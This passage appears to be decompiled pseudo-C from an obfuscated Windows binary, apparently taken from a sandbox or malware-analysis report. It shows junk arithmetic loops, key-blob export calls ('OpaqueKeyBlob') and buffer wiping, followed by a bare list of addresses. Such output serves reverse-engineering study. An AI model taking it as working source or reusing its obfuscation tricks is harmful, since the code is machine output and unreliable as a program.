							 *(_t1278 - 0x2f6) = _t926;
							 *(_t1278 - 0x234) = _t926 & 0x0000ffff;
							_push(0);
							 *(_t1278 - 0x19c) = ( *(_t1278 - 0x130) & 0x000000ff) + 0x26f9;
							_push(0x40);
							_push(_t1278 - 0xf0);
							_t931 = E00AEED60(_t986,  *((intOrPtr*)(_t1278 - 0x25c)), _t1278 - 0x6c, _t1248, _t1255);
							 *((intOrPtr*)(_t1278 - 0x2c8)) = 0x151cc;
							 *((short*)(_t1278 - 0x2dc)) = 0x151cc;
							E00AF8BB0(_t1248, _t1278 - 0x6c, 0, 0x34);
							_t937 =  *(_t1278 - 0x1d6) + 0xfd;
							 *(_t1278 - 0x12e) = _t937;
							 *(_t1278 - 0x1d6) = _t937;
							_t1005 =  *(_t1278 - 0x12e) + 0x21;
							 *(_t1278 - 0x22c) = _t1248 + 0x61;
							 *((char*)(_t1278 - 0x1a6)) = _t1005;
							_t1232 = 0x12157;
							 *((short*)(_t1278 - 0x214)) = 0x12157;
							 *((char*)(_t1278 - 0x1a5)) =  *(_t1278 - 0x12f) + 3;
							E00AF8BB0(0x12157, _t1278 - 0xf0, 0, 0x40);
							_t1288 = _t1283 + 0x3c;
							 *((char*)(_t1278 - 0x1be)) =  *((char*)(_t1278 - 0x1be)) + 2;
							__eflags = _t931;
							if(_t931 == 0) {
								_t1257 =  *(_t1278 - 0x13e);
								 *((char*)(_t1278 - 0x1df)) =  *(_t1278 - 0x130) - 1;
								_t988 = ( *(_t1278 - 0x1d9) & 0x000000ff) + 0x26b3;
								 *(_t1278 - 0x130) =  *(_t1278 - 0x1c5);
								L32:
								_t1041 =  *(_t1278 - 0x258) & 0x0000ffff;
								 *(_t1278 - 0x190) = _t988;
								_t989 = 0xe7e;
								__eflags = _t1041 - 0x42c1;
								if(_t1041 > 0x42c1) {
									_t1132 = _t1041 + 0xffffbd3f;
									 *(_t1278 - 0x22c) = 0xf5f9;
									_t989 = 0xe7e + _t1132;
									 *(_t1278 - 0x272) = _t989;
									 *((short*)(_t1278 - 0x2be)) = 0x2f09 + _t1132;
									_t1221 = 0x7be1;
									_t916 =  *(_t1278 - 0x135);
									asm("o16 nop [eax+eax]");
									do {
										_t1221 = _t1221 +  *(_t1278 - 0x22c);
										_t916 = _t916 + 0xff;
										 *(_t1278 - 0x17e) = _t916;
										 *(_t1278 - 0x2a8) = _t1221;
										_t1132 = _t1132 - 1;
										__eflags = _t1132;
									} while (_t1132 != 0);
									 *(_t1278 - 0x18c) = _t1221;
									 *(_t1278 - 0x135) = _t916;
								}
								_t752 =  *(_t1278 - 0x15d) + 1;
								_push(0);
								_push(0x20);
								 *(_t1278 - 0x13d) = _t752;
								 *(_t1278 - 0x15d) = _t752;
								_t753 = E00AEECD0( *((intOrPtr*)(_t1278 - 0x25c)),  *((intOrPtr*)(_t1278 - 0x200)), 0, 0,  *(_t1278 - 0x150)); // executed
								_t1289 = _t1288 + 0x14;
								__eflags = _t753;
								if(_t753 == 0) {
									_t1043 = _t989 & 0x0000ffff;
									__eflags = _t1043 - 0xe7e;
									if(_t1043 <= 0xe7e) {
										_t1233 = 0x11aa;
										 *(_t1278 - 0x12f) =  *(_t1278 - 0x163);
									} else {
										_t1127 = _t1043 + 0xfffff182;
										_t1233 = _t1127 + 0x11aa;
										_t1220 =  *(_t1278 - 0x131) + (_t1127 & 0x000000ff) * 0x17;
										 *(_t1278 - 0x131) = _t1220;
										_t1130 =  *(_t1278 - 0x163) + _t1127 + (_t1127 << 3) + _t1127 + (_t1127 << 3);
										 *(_t1278 - 0x162) = _t1220;
										 *(_t1278 - 0x12f) = _t1130;
										 *(_t1278 - 0x163) = _t1130;
									}
									_t755 =  *(_t1278 - 0x150);
									_t1178 = 0x20;
									asm("movaps xmm0, [0xb0a1c0]");
									_t1044 = _t1257 & 0x0000ffff;
									_t991 =  *(_t1278 - 0x208) +  *(_t1278 - 0x208);
									__eflags = _t991;
									asm("movups [eax], xmm0");
									asm("movups [eax+0x10], xmm0");
									do {
										_t1044 = _t1044 + 0xffff;
										 *(_t1278 - 0x1ab) = _t991;
										_t1178 = _t1178 - 1;
										__eflags = _t1178;
									} while (_t1178 != 0);
									 *(_t1278 - 0x222) = _t1044;
									_t1180 =  *(_t1278 - 0x139) + 1;
									_t1046 =  *(_t1278 - 0x17f) + 1;
									__eflags = _t1046;
									 *((char*)(_t1278 - 0x16f)) = _t1180;
									 *(_t1278 - 0x137) = _t1046;
									 *(_t1278 - 0x17f) = _t1046;
									_t1047 = 0x20;
									do {
										 *_t755 = 0;
										_t755 = _t755 + 1;
										_t1047 = _t1047 - 1;
										__eflags = _t1047;
									} while (_t1047 != 0);
									_t992 =  *(_t1278 - 0x132);
									__eflags = _t1233 - 0x11ad;
									if(_t1233 > 0x11ad) {
										_t373 = _t1233 - 0x11ad; // -3
										_t374 = _t1233 - 0x11ad; // -3
										_t906 = _t374;
										_t992 = _t992 + (_t373 & 0x000000ff) * ( *(_t1278 - 0x144) & 0x000000ff);
										_t1126 =  *(_t1278 - 0x185) + _t906;
										__eflags = _t1126;
										 *(_t1278 - 0x132) = _t992;
										 *(_t1278 - 0x154) = _t992;
										 *(_t1278 - 0x160) = _t1126;
										do {
											_t1180 = _t1180 + 0xff;
											_t906 = _t906 - 1;
											__eflags = _t906;
										} while (_t906 != 0);
										 *((char*)(_t1278 - 0x16f)) = _t1180;
									}
									E00AED7D0(_t992, 0xb0b8b8, 0x1c, _t1233, _t1257,  *0xb0d720,  *0xb0d724, _t1278 - 0x128);
									 *((char*)(_t1278 - 0x168)) =  *(_t1278 - 0x186) + 1;
									_push(0);
									_push(_t1278 - 0x12c);
									_push(0x230);
									_push( *(_t1278 - 0x150));
									_push(L"OpaqueKeyBlob");
									_t762 = E00AEEFE0( *((intOrPtr*)(_t1278 - 0x200)), _t992,  *((intOrPtr*)( *((intOrPtr*)(_t1278 - 0x200)))), _t1233, _t1257);
									_t993 =  *((intOrPtr*)(_t1278 - 0x17c));
									_t1258 = _t762;
									_t1050 = _t993 & 0x000000ff;
									 *(_t1278 - 0x208) = _t1050;
									 *(_t1278 - 0x174) = ( *(_t1278 - 0x171) & 0x000000ff) - _t1050 + ( *(_t1278 - 0x194) & 0x0000ffff);
									asm("cdq");
									asm("cdq");
									asm("sbb ecx, edx");
									_t1236 = ( *(_t1278 - 0x13d) & 0x000000ff) - ( *(_t1278 - 0x1b0) & 0x0000ffff) +  *(_t1278 - 0x144);
									asm("adc ecx, [ebp-0x198]");
									 *(_t1278 - 0x1b0) = _t1236;
									 *(_t1278 - 0x198) = 0;
									E00AF8BB0(_t1236, _t1278 - 0x128, 0, 0x38);
									_t1292 = _t1289 + 0x2c;
									_t1055 =  *(_t1278 - 0x144) + 1;
									 *(_t1278 - 0x194) = _t1055;
									_t772 = (_t993 & 0x000000ff) * (_t1055 & 0x0000ffff);
									 *(_t1278 - 0x22c) = _t772;
									 *(_t1278 - 0x286) = _t772;
									__eflags = _t762;
									if(_t762 == 0) {
										_t1183 =  *(_t1278 - 0x182) & 0x000000ff;
										__eflags = _t1183 - 0x72;
										if(_t1183 > 0x72) {
											_t1214 = _t1183 + 0xffffff8e;
											_t892 =  *(_t1278 - 0x133) + (_t1214 & 0x000000ff) * ( *(_t1278 - 0x15f) & 0x000000ff);
											_t422 = _t1278 - 0x17d;
											 *_t422 =  *(_t1278 - 0x17d) + _t1214;
											__eflags =  *_t422;
											_t1118 =  *(_t1278 - 0x198);
											 *(_t1278 - 0x133) = _t892;
											 *(_t1278 - 0x16d) = _t892;
											_t893 =  *(_t1278 - 0x12f);
											do {
												_t1236 = _t1236 + 1;
												asm("adc ecx, 0x0");
												_t893 = _t893 + 0xff;
												 *(_t1278 - 0x163) = _t893;
												_t1214 = _t1214 - 1;
												__eflags = _t1214;
											} while (_t1214 != 0);
											 *(_t1278 - 0x198) = _t1118;
											 *(_t1278 - 0x1b0) = _t1236;
											 *(_t1278 - 0x12f) = _t893;
										}
										E00AEEAE0(_t993, 0xb0d5d0, _t1236, _t1258);
										_t774 =  *(_t1278 - 0x288);
										 *(_t1278 - 0x12e) = _t774;
										 *(_t1278 - 0x155) = _t774;
										E00AEEAE0(_t993, 0xb0d5b0, _t1236, _t1258);
										_t1260 =  *(_t1278 - 0x174) + ( *(_t1278 - 0x133) & 0x000000ff);
										_t778 =  *(_t1278 - 0x150) + 0x230;
										 *(_t1278 - 0x174) = _t1260;
										_push(0);
										_push(0x10);
										 *((intOrPtr*)(_t1278 - 0x200)) =  *(_t1278 - 0x150) + 0x230;
										_t1237 = E00AEEDF0(_t993,  *((intOrPtr*)(_t1278 - 0x204)), _t778, _t1236, _t1260);
										_t1293 = _t1292 + 8;
										 *(_t1278 - 0x288) = (_t1260 & 0x0000ffff) +  *(_t1278 - 0x194);
										 *(_t1278 - 0x169) =  *(_t1278 - 0x134) + 1;
										E00AEEB70(_t993, 0xb0d5b0, _t1237, _t1260);
										asm("cdq");
										asm("cdq");
										asm("sbb ecx, edx");
										asm("cdq");
										asm("adc ecx, [ebp-0x198]");
										 *((intOrPtr*)(_t1278 - 0x204)) = ( *(_t1278 - 0x13b) & 0x000000ff) + ( *(_t1278 - 0x16b) & 0x000000ff) - E00B03060( *(_t1278 - 0x18c) & 0x0000ffff, _t778, ( *(_t1278 - 0x184) & 0x000000ff) - ( *(_t1278 - 0x12f) & 0x000000ff) +  *(_t1278 - 0x1b0), _t778);
										asm("sbb ecx, edx");
										 *(_t1278 - 0x18c) = 0;
										E00AEEB70(_t993, 0xb0d5d0, _t1237, ( *(_t1278 - 0x13b) & 0x000000ff) + ( *(_t1278 - 0x16b) & 0x000000ff) - E00B03060( *(_t1278 - 0x18c) & 0x0000ffff, _t778, ( *(_t1278 - 0x184) & 0x000000ff) - ( *(_t1278 - 0x12f) & 0x000000ff) +  *(_t1278 - 0x1b0), _t778));
										_t1186 = ( *(_t1278 - 0x157) & 0x000000ff) % ( *(_t1278 - 0x136) & 0x000000ff);
										_t994 =  *((intOrPtr*)(_t1278 - 0x274));
										asm("cdq");
										_t1070 =  *(_t1278 - 0x28a) + _t994 +  *(_t1278 - 0x138);
										_t1267 = _t1186;
										 *(_t1278 - 0x194) = _t1267;
										_t792 = _t1186;
										 *(_t1278 - 0x234) = _t792;
										 *(_t1278 - 0x138) = _t1070;
										 *(_t1278 - 0x15d) = _t1070;
										__eflags = _t1237;
										if(_t1237 == 0) {
											_t1187 =  *(_t1278 - 0x174);
											__eflags = _t1267 - _t1187;
											if(_t1267 != _t1187) {
												L62:
												_t793 =  *0xb08ac0; // 0x500051
												asm("movups xmm0, [0xb08ab0]");
												 *((intOrPtr*)(_t1278 - 0x360)) = _t793;
												_t794 =  *0xb08ac4; // 0x0
												 *(_t1278 - 0x35c) = _t794;
												asm("pextrw eax, xmm0, 0x4");
												asm("movups [ebp-0x370], xmm0");
												_t1189 = _t1187 % (_t794 & 0x0000ffff);
												_t797 = _t1189 & 0x0000ffff;
												 *(_t1278 - 0x36a) = _t797;
												asm("cdq");
												_t1269 = (_t1189 << 0x00000020 | _t797) << 1;
												 *(_t1278 - 0x144) = _t797 + _t797 -  *(_t1278 - 0x194);
												asm("sbb esi, [ebp-0x234]");
												 *((short*)(_t1278 - 0x2a4)) = 4;
												asm("cdq");
												 *(_t1278 - 0x178) = _t1269;
												_t802 = E00B030D0( *(_t1278 - 0x148) & 0x0000ffff, _t1189,  *((intOrPtr*)(_t1278 - 0x204)),  *(_t1278 - 0x18c));
												_t1238 = 0x62a8;
												_t1190 =  *(_t1278 - 0x144);
												 *(_t1278 - 0x270) = _t802;
												_t804 = (_t994 & 0x000000ff) +  *((intOrPtr*)(_t1278 - 0x244)) - 4;
												__eflags = _t804;
												 *(_t1278 - 0x148) = _t804;
												 *(_t1278 - 0x1fc) = _t804;
											} else {
												__eflags = _t792;
												if(_t792 != 0) {
													goto L62;
												} else {
													_t1269 = 0;
													 *((intOrPtr*)(_t1278 - 0x250)) = 0x5f4863b5;
													_t1190 = 0x5f + ( *(_t1278 - 0x22c) & 0x0000ffff) + 0xfffffffd;
													asm("adc esi, 0xffffffff");
													 *((intOrPtr*)(_t1278 - 0x24c)) = 0xf77a3cb;
													 *((intOrPtr*)(_t1278 - 0x248)) = 0x5710dc;
													_t1238 = (_t1070 & 0x000000ff) - ( *(_t1278 - 0x170) & 0x000000ff) + ( *(_t1278 - 0x13b) & 0x000000ff);
													 *(_t1278 - 0x144) = _t1190;
													 *(_t1278 - 0x178) = 0;
													 *(_t1278 - 0x1b4) = _t1238;
													 *(_t1278 - 0x1fa) = _t1238;
												}
											}
											_t1075 =  *(_t1278 - 0x174);
											asm("movups xmm0, [eax]");
											asm("movups [eax], xmm0");
											_t1270 = _t1190;
											 *(_t1278 - 0x238) = (_t1269 << 0x00000020 | _t1270) << 1;
											_t1271 = _t1270 + _t1270;
											 *((intOrPtr*)(_t1278 - 0x244)) = _t1271;
											 *((char*)(_t1278 - 0x183)) = _t1075 - _t994 + _t1190;
											 *(_t1278 - 0x157) = _t1075 -  *((intOrPtr*)(_t1278 - 0x181)) +  *((intOrPtr*)(_t1278 - 0x26e));
											_t815 =  *(_t1278 - 0x12e) & 0x000000ff;
											 *(_t1278 - 0x194) = _t815;
											_t997 = (_t1238 & 0x0000ffff) - _t1075 + _t815;
											E00AEEAE0(_t997, 0xb0d5d0, _t1238, _t1271);
											 *(_t1278 - 0x17e) =  *(_t1278 - 0x135) + 1;
											E00AEEAE0(_t997, 0xb0d5b0, _t1238, _t1271);
											_t1191 =  *(_t1278 - 0x238);
											_t1078 = 0x7a;
											__eflags = _t1191;
											if(__eflags < 0) {
												L71:
												 *(_t1278 - 0x18c) = _t997 & 0x0000ffff;
											} else {
												if(__eflags > 0) {
													L66:
													_t1244 =  *(_t1278 - 0x148);
													 *(_t1278 - 0x18c) = _t997 & 0x0000ffff;
													goto L67;
													do {
														do {
															L67:
															_t1244 = _t1244 + _t997;
															_t876 =  *(_t1278 - 0x258) + 1;
															 *(_t1278 - 0x1fc) = _t1244;
															 *(_t1278 - 0x258) = _t876;
															_t1078 = _t1078 + 1;
															 *(_t1278 - 0x278) = _t876;
															 *(_t1278 - 0x2ba) =  *(_t1278 - 0x2ba) * 0xa37;
															__eflags = 0 - _t1191;
														} while (__eflags < 0);
														if(__eflags <= 0) {
															goto L69;
														}
														break;
														L69:
														__eflags = _t1078 - _t1271;
													} while (_t1078 < _t1271);
													 *(_t1278 - 0x148) = _t1244;
													_t1238 =  *(_t1278 - 0x1b4);
												} else {
													__eflags = _t1271 - 0x7a;
													if(_t1271 <= 0x7a) {
														goto L71;
													} else {
														goto L66;
													}
												}
											}
											_push(2);
											_push(_t1278 - 0x12c);
											_push(0x400);
											_push( *(_t1278 - 0x150));
											_push(0);
											_push(0);
											_push(0);
											_push(0x240); // executed
											_t823 = E00AEEF50(_t997,  *(_t1278 - 0x23c),  *(_t1278 - 0x150), _t1238, _t1271); // executed
											_t1272 =  *(_t1278 - 0x144);
											_t1294 = _t1293 + 0x20;
											__eflags =  *(_t1278 - 0x138) - 0x26;
											 *(_t1278 - 0x23c) = _t823;
											if( *(_t1278 - 0x138) == 0x26) {
												_t1110 =  *0xb08ae0; // 0x35
												asm("movups xmm0, [0xb08ac8]");
												 *((intOrPtr*)(_t1278 - 0x340)) = _t1110;
												asm("movups [ebp-0x358], xmm0");
												asm("movq xmm0, [0xb08ad8]");
												asm("movq [ebp-0x348], xmm0");
												 *((short*)(_t1278 - 0x352)) = ( *(_t1278 - 0x354) >> 0x10) - 1;
												 *((short*)(_t1278 - 0x358)) = ( *(_t1278 - 0x184) & 0x000000ff) - 0x26 + ( *(_t1278 - 0x131) & 0x000000ff);
												_t873 =  *((intOrPtr*)(_t1278 - 0x244)) - _t1272 +  *(_t1278 - 0x18c) + 1;
												__eflags = _t873;
												 *(_t1278 - 0x270) = _t873;
											}
											E00AEEB70(_t997, 0xb0d5b0, _t1238, _t1272);
											_t1193 =  *(_t1278 - 0x240) & 0x0000ffff;
											__eflags = _t1193 - 0x532;
											if(_t1193 > 0x532) {
												_t1109 =  *(_t1278 - 0x170) & 0x000000ff;
												_t1206 = _t1193 + 0xffffface;
												_t997 = _t997 + _t1206 *  *(_t1278 - 0x208);
												_t1238 = _t1238 + _t1206;
												 *(_t1278 - 0x1fa) = _t1238;
												asm("o16 nop [eax+eax]");
												do {
													 *(_t1278 - 0x28c) = _t1109 *  *(_t1278 - 0x28c);
													_t1206 = _t1206 - 1;
													__eflags = _t1206;
												} while (_t1206 != 0);
											}
											E00AEEB70(_t997, 0xb0d5d0, _t1238, _t1272);
											_t1194 =  *(_t1278 - 0x178);
											_t1082 = 0x3d;
											__eflags = _t1194;
											if(__eflags >= 0) {
												if(__eflags > 0) {
													L80:
													_t857 =  *(_t1278 - 0x137) & 0x000000ff;
													 *(_t1278 - 0x1b4) = _t857;
													 *(_t1278 - 0x240) = 0x29d2;
													goto L81;
													do {
														do {
															L81:
															_t1238 = _t1238 +  *(_t1278 - 0x240);
															_t997 = _t997 + _t857;
															_t1082 = _t1082 + 1;
															 *(_t1278 - 0x15f) =  *(_t1278 - 0x15f) + 0xc4;
															_t859 =  *(_t1278 - 0x254) + 1;
															 *(_t1278 - 0x254) = _t859;
															 *(_t1278 - 0x2a2) = _t859;
															 *(_t1278 - 0x1fa) = _t1238;
															 *(_t1278 - 0x28a) =  *(_t1278 - 0x28a) * 0x33e3;
															__eflags = 0 - _t1194;
															_t857 =  *(_t1278 - 0x1b4);
														} while (__eflags < 0);
														if(__eflags <= 0) {
															goto L83;
														}
														goto L84;
														L83:
														__eflags = _t1082 - _t1272;
													} while (_t1082 < _t1272);
												} else {
													__eflags = _t1272 - 0x3d;
													if(_t1272 > 0x3d) {
														goto L80;
													}
												}
											}
											L84:
											__eflags =  *(_t1278 - 0x23c);
											if( *(_t1278 - 0x23c) == 0) {
												_push(0x400);
												_t998 = _t997 - 1;
												E00AE2EA0( *((intOrPtr*)(_t1278 - 0x300)), _t1238,  *(_t1278 - 0x150));
												_t1084 =  *(_t1278 - 0x178);
												_t1294 = _t1294 + 8;
												__eflags =  *(_t1278 - 0x182);
												if( *(_t1278 - 0x182) != 0) {
													L89:
													 *(_t1278 - 0x17b) =  *(_t1278 - 0x136) + 1;
													asm("cdq");
													_t831 = E00B030D0( *(_t1278 - 0x194), 0x400, _t1272, _t1084);
													_t1086 = _t831 +  *(_t1278 - 0x288);
													 *(_t1278 - 0x157) = _t1086;
													_t833 = _t831 - _t998 +  *(_t1278 - 0x1fa);
													__eflags = _t833;
													 *(_t1278 - 0x270) = (_t1086 & 0x000000ff) - ( *(_t1278 - 0x12e) & 0x000000ff) + _t1238;
													 *(_t1278 - 0x15d) = _t833;
												} else {
													__eflags = _t1272 | _t1084;
													if((_t1272 | _t1084) != 0) {
														goto L89;
													} else {
														 *(_t1278 - 0x1fa) = _t1238 + 0xffff;
													}
												}
												_t1273 = 1;
											} else {
												_t1273 = 0xfffffff9;
												 *((intOrPtr*)(_t1278 - 0x31a)) =  *((intOrPtr*)(_t1278 - 0x31a)) + 0xfffb;
												 *((short*)(_t1278 - 0x2d6)) = 0x26b3 + ( *(_t1278 - 0x19c) & 0x0000ffff) + ( *(_t1278 - 0x19c) & 0x0000ffff) * 4;
												 *(_t1278 - 0x1cc) =  *(_t1278 - 0x1cc) + 1;
												 *((short*)(_t1278 - 0x2da)) = ( *(_t1278 - 0x187) & 0x000000ff) + ( *(_t1278 - 0x188) & 0x000000ff) +  *((intOrPtr*)(_t1278 - 0x2c8));
												 *((short*)(_t1278 - 0x33a)) = ( *(_t1278 - 0x1a0) & 0x0000ffff) + ( *(_t1278 - 0x1a0) & 0x0000ffff) * 4 -  *((intOrPtr*)(_t1278 - 0x216)) +  *((intOrPtr*)(_t1278 - 0x224));
											}
										} else {
											_t1211 =  *(_t1278 - 0x190);
											_t1273 = 0xfffffffa;
											 *((short*)(_t1278 - 0x31c)) =  *((short*)(_t1278 - 0x31c)) + 1;
											 *((char*)(_t1278 - 0x1ec)) = _t1211 +  *((intOrPtr*)(_t1278 - 0x218)) +  *((intOrPtr*)(_t1278 - 0x13a));
											 *(_t1278 - 0x1c6) = (_t1211 & 0x000000ff) * ( *(_t1278 - 0x130) & 0x000000ff);
											 *((short*)(_t1278 - 0x33c)) =  *(_t1278 - 0x1a0) -  *((intOrPtr*)(_t1278 - 0x336)) +  *(_t1278 - 0x19c);
										}
										goto L91;
									} else {
										_t1273 = 0xfffffffb;
										_t999 =  *((intOrPtr*)(_t1278 - 0x12d));
										 *((short*)(_t1278 - 0x2fa)) =  *((intOrPtr*)(_t1278 - 0x2fc)) +  *(_t1278 - 0x1a0);
										 *(_t1278 - 0x222) = ( *(_t1278 - 0x1cc) & 0x000000ff) +  *(_t1278 - 0x19c);
										 *(_t1278 - 0x1c5) =  *(_t1278 - 0x130) + 1;
										__eflags =  *((intOrPtr*)(_t1278 - 0x14a)) -  *((intOrPtr*)(_t1278 - 0x33c));
										if( *((intOrPtr*)(_t1278 - 0x14a)) <=  *((intOrPtr*)(_t1278 - 0x33c))) {
											 *(_t1278 - 0x1d6) =  *(_t1278 - 0x12e) + 1;
										} else {
											_t1121 = ( *(_t1278 - 0x1db) & 0x000000ff) +  *(_t1278 - 0x190);
											 *((short*)(_t1278 - 0x2f4)) = _t1121;
											 *((short*)(_t1278 - 0x214)) =  *((intOrPtr*)(_t1278 - 0x176)) - (_t999 & 0x000000ff) - _t1121;
										}
									}
								} else {
									 *((char*)(_t1278 - 0x1bd)) =  *((char*)(_t1278 - 0x1bd)) + 1;
									 *((char*)(_t1278 - 0x1b9)) =  *((char*)(_t1278 - 0x1b9)) + 1;
									_t1273 = 0xfffffffc;
									 *((short*)(_t1278 - 0x224)) =  *((intOrPtr*)(_t1278 - 0x14a)) + 0xffff;
									 *((short*)(_t1278 - 0x214)) = _t1232 + 0xffff;
									goto L91;
								}
							} else {
								_t1007 = _t1005 + 0x16;
								_t1273 = 0xfffffffc;
								 *((intOrPtr*)(_t1278 - 0x1d8)) =  *((intOrPtr*)(_t1278 - 0x1d8)) + _t1005 + 0x16 + _t1005 + 0x16 + _t1007 + _t1005 + 0x16 + _t1007;
								__eflags =  *(_t1278 - 0x234) - 1;
								 *(_t1278 - 0x222) =  *(_t1278 - 0x190) + 4;
								if( *(_t1278 - 0x234) > 1) {
									asm("movups xmm0, [0xb08a78]");
									_t953 =  *0xb08a88; // 0x0
									 *((short*)(_t1278 - 0x374)) = _t953;
									asm("movd eax, xmm0");
									asm("movups [ebp-0x384], xmm0");
									 *((char*)(_t1278 - 0x1ba)) =  *((intOrPtr*)(_t1278 - 0x1c9));
									 *((short*)(_t1278 - 0x382)) = ( *(_t1278 - 0x1bb) & 0x000000ff) - _t953 +  *(_t1278 - 0x22c);
									 *((char*)(_t1278 - 0x1be)) =  *((intOrPtr*)(_t1278 - 0x218)) + 1;
								}
								goto L91;
							}
						}
					} else {
						_t1273 = 0xfffffffd;
						 *(_t1278 - 0x1ab) = 0x2a;
						L91:
						_t999 =  *((intOrPtr*)(_t1278 - 0x12d));
					}
					_t1201 = ( *(_t1278 - 0x1d7) & 0x000000ff) + (_t999 & 0x000000ff) +  *((intOrPtr*)(_t1278 - 0x226));
					memset( *(_t1278 - 0x150), 0x1010101, 0x100 << 2);
					_t837 = 0x400;
					 *((intOrPtr*)(_t1278 - 0x332)) =  *((intOrPtr*)(_t1278 - 0x332)) + 0x400;
					asm("o16 nop [eax+eax]");
					do {
						 *((short*)(_t1278 - 0x216)) = _t1201;
						_t837 = _t837 - 1;
						__eflags = _t837;
					} while (_t837 != 0);
					_t1000 =  *(_t1278 - 0x132);
					_t839 =  *(_t1278 - 0x254) & 0x0000ffff;
					__eflags = _t839 - 0x5974;
					if(_t839 > 0x5974) {
						_t845 = _t839 + 0xffffa68c;
						 *(_t1278 - 0x1fc) =  *(_t1278 - 0x148) + _t845;
						_t1000 = _t1000 + _t845;
						__eflags = _t1000;
						 *((short*)(_t1278 - 0x1f8)) = 0x201d + _t845;
						 *(_t1278 - 0x154) = _t1000;
					}
					_t1241 =  *(_t1278 - 0x150);
					_t1092 = 0x400;
					_t840 =  *(_t1278 - 0x150);
					do {
						 *_t840 = 0;
						_t840 = _t840 + 1;
						_t1092 = _t1092 - 1;
						__eflags = _t1092;
					} while (_t1092 != 0);
					_push(0x8000);
					E00AEE110(_t1000, _t1241, _t1241, _t1273); // executed
					_t1203 =  *(_t1278 - 0x304) & 0x000000ff;
					__eflags = _t1203 - 0x1c;
					if(_t1203 > 0x1c) {
						_t1204 = _t1203 + 0xffffffe4;
						__eflags = _t1204;
						do {
							_t1000 = _t1000 + (_t1000 << 2);
							_t1204 = _t1204 - 1;
							__eflags = _t1204;
						} while (_t1204 != 0);
					}
					__eflags =  *(_t1278 - 4) ^ _t1278;
					return E00AF7B30( *(_t1278 - 4) ^ _t1278);
				} else {
					return E00AF7B30( *(_t1278 - 4) ^ _t1278);
				}
			}
























































































































































































          0x00ae2f76
          0x00ae2f77
          0x00ae2f7a
          0x00ae2f7b
          0x00ae2f7d
          0x00ae2f7e
          0x00ae2f88
          0x00ae2f8a
          0x00ae2f91
          0x00ae2f99
          0x00ae2fa0
          0x00ae2fa6
          0x00ae2fab
          0x00ae2fb0
          0x00ae2fb8
          0x00ae2fc0
          0x00ae2fc8
          0x00ae2fd0
          0x00ae2fd8
          0x00ae2fde
          0x00ae2fe3
          0x00ae2ff0
          0x00ae2ff7
          0x00ae2ffc
          0x00ae3002
          0x00ae3007
          0x00ae300d
          0x00ae3012
          0x00ae301f
          0x00ae302d
          0x00ae3035
          0x00ae303d
          0x00ae3044
          0x00ae3049
          0x00ae3051
          0x00ae3059
          0x00ae3066
          0x00ae306e
          0x00ae3076
          0x00ae307d
          0x00ae3082
          0x00ae308a
          0x00ae3092
          0x00ae309d
          0x00ae30a5
          0x00ae30ad
          0x00ae30b5
          0x00ae30bf
          0x00ae30c8
          0x00ae30d2
          0x00ae30db
          0x00ae30e2
          0x00ae30ec
          0x00ae30f6
          0x00ae30fd
          0x00ae3105
          0x00ae310f
          0x00ae3119
          0x00ae3123
          0x00ae312d
          0x00ae3134
          0x00ae313b
          0x00ae3140
          0x00ae3145
          0x00ae314a
          0x00ae3157
          0x00ae315e
          0x00ae3163
          0x00ae3170
          0x00ae3177
          0x00ae317e
          0x00ae3183
          0x00ae3189
          0x00ae318e
          0x00ae319b
          0x00ae31a7
          0x00ae31af
          0x00ae31b5
          0x00ae31c1
          0x00ae31cc
          0x00ae31d7
          0x00ae31dd
          0x00ae31e2
          0x00ae31e9
          0x00ae31ef
          0x00ae31fe
          0x00ae3205
          0x00ae320a
          0x00ae3212
          0x00ae3219
          0x00ae3225
          0x00ae322f
          0x00ae3239
          0x00ae3241
          0x00ae3248
          0x00ae3251
          0x00ae3257
          0x00ae3266
          0x00ae326d
          0x00ae3270
          0x00ae327a
          0x00ae3284
          0x00ae328e
          0x00ae3298
          0x00ae32a2
          0x00ae32ac
          0x00ae32b6
          0x00ae32c0
          0x00ae32ca
          0x00ae32d4
          0x00ae32de
          0x00ae32e8
          0x00ae32f2
          0x00ae32fc
          0x00ae3306
          0x00ae3310
          0x00ae331a
          0x00ae3324
          0x00ae332e
          0x00ae3338
          0x00ae3342
          0x00ae334c
          0x00ae3356
          0x00ae3360
          0x00ae3367
          0x00ae336e
          0x00ae337e
          0x00ae3383
          0x00ae338a
          0x00ae3396
          0x00ae33a1
          0x00ae33a7
          0x00ae33b7
          0x00ae33bd
          0x00ae33c4
          0x00ae33d0
          0x00ae33d6
          0x00ae33d6
          0x00ae33d9
          0x00ae33e3
          0x00ae33e3
          0x00ae33e6
          0x00ae33e7
          0x00ae33ea
          0x00ae33f1
          0x00ae33f8
          0x00ae33fb
          0x00ae3406
          0x00ae3461
          0x00ae346d
          0x00ae3408
          0x00ae340e
          0x00ae340e
          0x00ae341c
          0x00ae3422
          0x00ae3428
          0x00ae342e
          0x00ae342e
          0x00ae3434
          0x00ae3434
          0x00ae3436
          0x00ae343b
          0x00ae343d
          0x00ae3443
          0x00ae3446
          0x00000000
          0x00ae3448
          0x00ae3448
          0x00ae344e
          0x00ae3453
          0x00ae3453
          0x00ae3446
          0x00ae3473
          0x00ae347a
          0x00ae3481
          0x00ae3487
          0x00ae3491
          0x00ae3497
          0x00ae349d
          0x00ae34a7
          0x00ae34f1
          0x00ae34fd
          0x00ae34fd
          0x00ae34ff
          0x00ae3506
          0x00ae350b
          0x00ae34a9
          0x00ae34a9
          0x00ae34af
          0x00ae34bc
          0x00ae34be
          0x00ae34c4
          0x00ae34cb
          0x00ae34d1
          0x00ae34d8
          0x00ae34de
          0x00ae34df
          0x00ae34e1
          0x00ae34e3
          0x00ae3511
          0x00ae3518
          0x00ae3521
          0x00ae3563
          0x00ae3523
          0x00ae3523
          0x00ae3526
          0x00ae3528
          0x00ae352e
          0x00ae353a
          0x00ae3541
          0x00ae3547
          0x00ae3550
          0x00ae3550
          0x00ae3553
          0x00ae3556
          0x00ae3559
          0x00ae355c
          0x00ae355c
          0x00ae3561
          0x00ae357a
          0x00ae357f
          0x00ae3585
          0x00ae3588
          0x00ae358b
          0x00ae3591
          0x00ae3593
          0x00ae3599
          0x00ae359c
          0x00ae35a2
          0x00ae35a8
          0x00ae35b0
          0x00ae35c6
          0x00ae35c6
          0x00ae35c9
          0x00ae35ce
          0x00ae35d4
          0x00ae35db
          0x00ae35e0
          0x00ae35e0
          0x00ae35e3
          0x00ae35e6
          0x00ae35e6
          0x00ae35e6
          0x00ae35eb
          0x00ae35f6
          0x00ae35fc
          0x00ae3603
          0x00ae360a
          0x00ae3610
          0x00ae3616
          0x00ae361c
          0x00ae3621
          0x00ae362a
